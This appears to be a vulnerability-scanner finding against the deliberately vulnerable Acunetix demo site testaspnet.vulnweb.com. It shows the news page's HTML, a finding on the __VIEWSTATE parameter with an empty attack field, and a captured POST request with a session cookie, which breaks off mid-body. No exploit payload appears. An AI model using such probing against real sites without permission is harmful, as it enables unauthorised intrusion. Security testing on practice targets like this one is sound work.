value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNBPxOo+suXOQO2cYqA7NT0P30nF" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 465 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 Content-Length: 6555 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,555 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR